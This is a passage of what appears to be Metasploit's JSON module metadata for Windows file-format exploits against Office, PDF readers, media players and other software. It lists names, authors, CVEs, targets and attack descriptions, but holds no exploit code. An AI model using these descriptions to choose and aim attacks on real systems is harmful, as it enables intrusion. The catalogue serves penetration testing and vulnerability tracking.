Embedding (OLE)\n allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.\n The Microsoft update tried to fix the vulnerability publicly known as \"Sandworm\". Platforms\n such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known\n to be vulnerable. However, based on our testing, the most reliable setup is on Windows\n platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other\n setups such as using Office 2010 SP1 might be less stable, and may end up with a\n crash due to a failure in the CPackage::CreateTempFileName function.", + "references": [ + "CVE-2014-6352", + "MSB-MS14-064", + "BID-70690", + "URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1 / Office 2010 SP2 / Office 2013" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms14_064_packager_run_as_admin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms15_020_shortcut_icon_dllloader": { + "name": "Microsoft Windows Shell LNK Code Execution", + "fullname": "exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-03-10", + "type": "exploit", + "author": [ + "Michael Heerklotz", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This module creates the required files to exploit the vulnerability. They must be\n uploaded to an UNC path accessible by the target. This module has been tested successfully\n on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.", + "references": [ + "CVE-2015-0096", + "MSB-MS15-020", + "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so", + "URL-https://github.com/rapid7/metasploit-framework/pull/4911" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms15_020_shortcut_icon_dllloader", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms15_100_mcl_exe": { + "name": "MS15-100 Microsoft Windows Media Center MCL Vulnerability", + "fullname": "exploit/windows/fileformat/ms15_100_mcl_exe", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-09-08", + "type": "exploit", + "author": [ + "sinn3r " + ], + "description": "This module exploits a vulnerability in Windows Media Center. By supplying\n an UNC path in the *.mcl file, a remote file will be automatically downloaded,\n which can result in arbitrary code execution.", + "references": [ + "CVE-2015-2509", + "MSB-MS15-100" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms15_100_mcl_exe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ms_visual_basic_vbp": { + "name": "Microsoft Visual Basic VBP Buffer Overflow", + "fullname": "exploit/windows/fileformat/ms_visual_basic_vbp", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-09-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Microsoft Visual\n Basic 6.0. When a specially crafted vbp file containing a long\n reference line, an attacker may be able to execute arbitrary\n code.", + "references": [ + "CVE-2007-4776", + "OSVDB-36936", + "BID-25629" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 English" + ], + "mod_time": "2021-02-13 04:10:13 +0000", + "path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ms_visual_basic_vbp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mswin_tiff_overflow": { + "name": "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow", + "fullname": "exploit/windows/fileformat/mswin_tiff_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-11-05", + "type": "exploit", + "author": [ + "Unknown", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Microsoft's Tagged Image File Format.\n It was originally discovered in the wild, targeting Windows XP and Windows Server 2003\n users running Microsoft Office, specifically in the Middle East and South Asia region.\n\n The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a\n drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,\n and stored in the EAX register. The 32-bit register will run out of storage space to\n represent the large value, which ends up being 0, but it still gets pushed as a\n dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a\n chunk anyway with size 0, and the address of this chunk is used as the destination buffer\n of a memcpy function, where the source buffer is the EXIF data (an extended image format\n supported by TIFF), and is also user-controlled. A function pointer in the chunk returned\n by HeapAlloc will end up being overwritten by the memcpy function, and then later used\n in OGL!GdipCreatePath. By successfully controlling this function pointer, and the\n memory layout using ActiveX, it is possible to gain arbitrary code execution under the\n context of the user.", + "references": [ + "CVE-2013-3906", + "MSB-MS13-096", + "OSVDB-99376", + "URL-http://technet.microsoft.com/en-us/security/advisory/2896666", + "URL-http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 with Office Standard 2010" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mswin_tiff_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/msworks_wkspictureinterface": { + "name": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution", + "fullname": "exploit/windows/fileformat/msworks_wkspictureinterface", + "aliases": [], + "rank": 100, + "disclosure_date": "2008-11-28", + "type": "exploit", + "author": [ + "dean " + ], + "description": "The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n to execute arbitrary code on a system. By passing a negative integer to the\n WksPictureInterface method, an attacker could execute arbitrary code on the system\n with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\n This control is not marked safe for scripting, please choose your attack vector carefully.", + "references": [ + "CVE-2008-1898", + "OSVDB-44458" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2-SP3 IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/msworks_wkspictureinterface", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/mymp3player_m3u": { + "name": "Steinberg MyMP3Player 3.0 Buffer Overflow", + "fullname": "exploit/windows/fileformat/mymp3player_m3u", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-03-18", + "type": "exploit", + "author": [ + "n3w7u", + "m_101" + ], + "description": "This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When\n the application is used to open a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "OSVDB-64580", + "EDB-11791" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal", + "Windows Universal (SEH)", + "Windows XP SP3 French" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/mymp3player_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/netop": { + "name": "NetOp Remote Control Client 9.5 Buffer Overflow", + "fullname": "exploit/windows/fileformat/netop", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-04-28", + "type": "exploit", + "author": [ + "Ruben Alejandro \"chap0\"" + ], + "description": "This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.\n When opening a .dws file containing a specially crafted string longer then 520\n characters will allow an attacker to execute arbitrary code.", + "references": [ + "OSVDB-72291", + "EDB-17223" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/netop.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/netop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/nitro_reader_jsapi": { + "name": "Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution", + "fullname": "exploit/windows/fileformat/nitro_reader_jsapi", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-07-24", + "type": "exploit", + "author": [ + "mr_me ", + "bcoles ", + "sinn3r " + ], + "description": "This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro\n PDF Reader version 11. The saveAs() Javascript API function allows for writing\n arbitrary files to the file system. Additionally, the launchURL() function allows\n an attacker to execute local files on the file system and bypass the security dialog\n\n Note: This is 100% reliable.", + "references": [ + "CVE-2017-7442", + "URL-http://srcincite.io/advisories/src-2017-0005/", + "URL-https://blogs.securiteam.com/index.php/archives/3251" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/nitro_reader_jsapi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/fileformat/nuance_pdf_launch_overflow": { + "name": "Nuance PDF Reader v6.0 Launch Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/nuance_pdf_launch_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-08", + "type": "exploit", + "author": [ + "corelanc0d3r ", + "rick2600" + ], + "description": "This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is\n triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record.\n This exploit does not use javascript.", + "references": [ + "OSVDB-68514", + "URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Nuance PDF Reader v6.x (XP SP3)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/nuance_pdf_launch_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_dde_delivery": { + "name": "Microsoft Office DDE Payload Delivery", + "fullname": "exploit/windows/fileformat/office_dde_delivery", + "aliases": [], + "rank": 0, + "disclosure_date": "2017-10-09", + "type": "exploit", + "author": [ + "mumbai" + ], + "description": "This module generates an DDE command to place within\n a word document, that when executed, will retrieve a HTA payload\n via HTTP from an web server.", + "references": [ + "URL-https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563", + "URL-https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/office_dde_delivery.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_dde_delivery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_excel_slk": { + "name": "Microsoft Excel .SLK Payload Delivery", + "fullname": "exploit/windows/fileformat/office_excel_slk", + "aliases": [], + "rank": 0, + "disclosure_date": "2018-10-07", + "type": "exploit", + "author": [ + "Carter Brainerd", + "Stan Hegt", + "Pieter Ceelen" + ], + "description": "This module generates a download and execute Powershell\n command to be placed in an .SLK Excel spreadsheet.\n When executed, it will retrieve a payload via HTTP\n from a web server. When the file is opened, the\n user will be prompted to \"Enable Content.\" Once\n this is pressed, the payload will execute.", + "references": [ + "URL-https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files", + "URL-https://www.twitter.com/StanHacked/status/1049047727403937795", + "URL-http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Excel" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/office_excel_slk.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_excel_slk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_ms17_11882": { + "name": "Microsoft Office CVE-2017-11882", + "fullname": "exploit/windows/fileformat/office_ms17_11882", + "aliases": [], + "rank": 0, + "disclosure_date": "2017-11-15", + "type": "exploit", + "author": [ + "mumbai", + "embedi" + ], + "description": "Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.", + "references": [ + "CVE-2017-11882", + "URL-http://web.archive.org/web/20211201000500/https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about", + "URL-https://github.com/embedi/CVE-2017-11882" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/fileformat/office_ms17_11882.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_ms17_11882", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_ole_multiple_dll_hijack": { + "name": "Office OLE Multiple DLL Side Loading Vulnerabilities", + "fullname": "exploit/windows/fileformat/office_ole_multiple_dll_hijack", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-12-08", + "type": "exploit", + "author": [ + "Yorick Koster" + ], + "description": "Multiple DLL side loading vulnerabilities were found in various COM components.\n These issues can be exploited by loading various these components as an embedded\n OLE object. When instantiating a vulnerable object Windows will try to load one\n or more DLLs from the current working directory. If an attacker convinces the\n victim to open a specially crafted (Office) document from a directory also\n containing the attacker's DLL file, it is possible to execute arbitrary code with\n the privileges of the target user. This can potentially result in the attacker\n taking complete control of the affected system.", + "references": [ + "CVE-2015-6132", + "CVE-2015-6128", + "CVE-2015-6133", + "CVE-2016-0041", + "CVE-2016-0100", + "CVE-2016-3235", + "MSB-MS15-132", + "MSB-MS16-014", + "MSB-MS16-025", + "MSB-MS16-041", + "MSB-MS16-070", + "URL-https://securify.nl/advisory/SFY20150801/com__services_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150805/event_viewer_snapin_multiple_dll_side_loading_vulnerabilities.html", + "URL-https://securify.nl/advisory/SFY20150803/windows_authentication_ui_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20151102/shutdown_ux_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150802/shockwave_flash_object_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150806/ole_db_provider_for_oracle_multiple_dll_side_loading_vulnerabilities.html", + "URL-https://securify.nl/advisory/SFY20150905/nps_datastore_server_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150906/bda_mpeg2_transport_information_filter_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20151101/mapsupdatetask_task_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150904/windows_mail_find_people_dll_side_loading_vulnerability.html", + "URL-https://securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "All", + "COM+ Services / Windows Vista - 10 / Office 2007 - 2016 (MS15-132)", + "Shockwave Flash Object / Windows 10 / Office 2013 (APSB15-28)", + "Windows Authentication UI / Windows 10 / Office 2013 - 2016 (MS15-132)", + "Shutdown UX / Windows 10 / Office 2016 (MS15-132)", + "MapUpdateTask Tasks / Windows 10 / Office 2016 (MS16-014)", + "Microsoft Visio 2010 / Windows 7 (MS16-070)", + "Event Viewer Snapin / Windows Vista - 7 / Office 2007 - 2013 (MS15-132)", + "OLE DB Provider for Oracle / Windows Vista - 7 / Office 2007 - 2013 (MS16-014)", + "Windows Mail Find People / Windows Vista / Office 2010 (MS16-025)", + "NPS Datastore server / Windows Vista / Office 2010 (MS16-014)", + "BDA MPEG2 Transport Information Filter / Windows Vista / Office 2010 (MS16-014)" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/fileformat/office_ole_multiple_dll_hijack.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_ole_multiple_dll_hijack", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/office_word_hta": { + "name": "Microsoft Office Word Malicious Hta Execution", + "fullname": "exploit/windows/fileformat/office_word_hta", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-04-14", + "type": "exploit", + "author": [ + "Haifei Li", + "ryHanson", + "wdormann", + "DidierStevens", + "vysec", + "Nixawk", + "sinn3r " + ], + "description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a olelink object can make a http(s) request,\n and execute hta code in response.\n\n This bug was originally seen being exploited in the wild starting\n in Oct 2016. This module was created by reversing a public\n malware sample.", + "references": [ + "CVE-2017-0199", + "URL-https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/", + "URL-https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html", + "URL-https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/", + "URL-https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html", + "URL-https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html", + "URL-https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf", + "URL-https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/", + "URL-https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100", + "URL-https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/", + "URL-https://www.microsoft.com/en-us/download/details.aspx?id=10725", + "URL-https://msdn.microsoft.com/en-us/library/dd942294.aspx", + "URL-https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Word" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/office_word_hta.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/office_word_hta", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/openoffice_ole": { + "name": "OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow", + "fullname": "exploit/windows/fileformat/openoffice_ole", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-04-17", + "type": "exploit", + "author": [ + "Marsu ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in OpenOffice 2.3.1 and 2.3.0 on\n Microsoft Windows XP SP3.\n\n By supplying a OLE file with a malformed DocumentSummaryInformation stream, an\n attacker can gain control of the execution flow, which results arbitrary code\n execution under the context of the user.", + "references": [ + "CVE-2008-0320", + "OSVDB-44472", + "BID-28819", + "EDB-5584", + "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=694" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "OpenOffice 2.3.1 / 2.3.0 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/openoffice_ole.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/openoffice_ole", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/orbit_download_failed_bof": { + "name": "Orbit Downloader URL Unicode Conversion Overflow", + "fullname": "exploit/windows/fileformat/orbit_download_failed_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-04-03", + "type": "exploit", + "author": [ + "Diego Juarez", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow in Orbit Downloader.\n The vulnerability is due to Orbit converting a URL ascii string to unicode\n in an insecure way with MultiByteToWideChar.\n The vulnerability is exploited with a specially crafted metalink file that\n should be opened with Orbit through the \"File->Add Metalink...\" option.", + "references": [ + "BID-28541", + "OSVDB-44036", + "CVE-2008-1602", + "URL-http://www.coresecurity.com/content/orbit-downloader" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Orbit Downloader 6.4 on Windows XP SP3", + "Orbit Downloader 6.4 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/orbit_download_failed_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/orbital_viewer_orb": { + "name": "Orbital Viewer ORB File Parsing Buffer Overflow", + "fullname": "exploit/windows/fileformat/orbital_viewer_orb", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-02-27", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in David Manthey's\n Orbital Viewer. When processing .ORB files, data is read from file into\n a fixed-size stack buffer using the fscanf function. Since no bounds\n checking is done, a buffer overflow can occur. Attackers can execute\n arbitrary code by convincing their victim to open an ORB file.", + "references": [ + "BID-38436", + "OSVDB-62580", + "CVE-2010-0688", + "URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/", + "EDB-11581" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Orbital Viewer 1.04 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/orbital_viewer_orb.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/orbital_viewer_orb", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/ovf_format_string": { + "name": "VMWare OVF Tools Format String Vulnerability", + "fullname": "exploit/windows/fileformat/ovf_format_string", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-11-08", + "type": "exploit", + "author": [ + "Jeremy Brown", + "juan vazquez " + ], + "description": "This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for\n Windows. The vulnerability occurs when printing error messages while parsing a\n a malformed OVF file. The module has been tested successfully with VMWare OVF Tools\n 2.1 on Windows XP SP3.", + "references": [ + "CVE-2012-3569", + "OSVDB-87117", + "BID-56468", + "URL-https://www.vmware.com/security/advisories/VMSA-2012-0015.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VMWare OVF Tools 2.1 on Windows XP SP3" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/fileformat/ovf_format_string.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/ovf_format_string", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/proshow_cellimage_bof": { + "name": "ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/proshow_cellimage_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-08-20", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549.\n An attacker must send the file to victim and the victim must open the file.", + "references": [ + "CVE-2009-3214", + "OSVDB-57226", + "EDB-9483", + "EDB-9519" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/proshow_cellimage_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/proshow_load_bof": { + "name": "Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow", + "fullname": "exploit/windows/fileformat/proshow_load_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-06", + "type": "exploit", + "author": [ + "Julien Ahrens", + "mr.pr0n", + "juan vazquez " + ], + "description": "This module exploits a stack-based buffer overflow in Photodex ProShow Producer\n v5.0.3256 in the handling of the plugins load list file. An attacker must send the\n crafted \"load\" file to victim, who must store it in the installation directory. The\n vulnerability will be triggered the next time ProShow is opened. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "OSVDB-83745", + "EDB-19563", + "EDB-20036", + "URL-http://security.inshell.net/advisory/30" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/proshow_load_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/proshow_load_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/publishit_pui": { + "name": "Publish-It PUI Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/publishit_pui", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-05", + "type": "exploit", + "author": [ + "Daniel Kazimirow", + "Andrew Smith \"jakx_\"" + ], + "description": "This module exploits a stack based buffer overflow in Publish-It when\n processing a specially crafted .PUI file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Publish-It to open a malicious .PUI file.", + "references": [ + "OSVDB-102911", + "CVE-2014-0980", + "EDB-31461" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Publish-It 3.6d" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/publishit_pui.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/publishit_pui", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/real_networks_netzip_bof": { + "name": "Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability", + "fullname": "exploit/windows/fileformat/real_networks_netzip_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-01-30", + "type": "exploit", + "author": [ + "C4SS!0 G0M3S", + "TecR0c " + ], + "description": "This module exploits a stack-based buffer overflow vulnerability in\n version 7.5.1 86 of Real Networks Netzip Classic.\n In order for the command to be executed, an attacker must convince someone to\n load a specially crafted zip file with NetZip Classic.\n By doing so, an attacker can execute arbitrary code as the victim user.", + "references": [ + "OSVDB-83436", + "EDB-16083", + "BID-46059", + "URL-http://proforma.real.com" + ], + "platform": "Windows", + 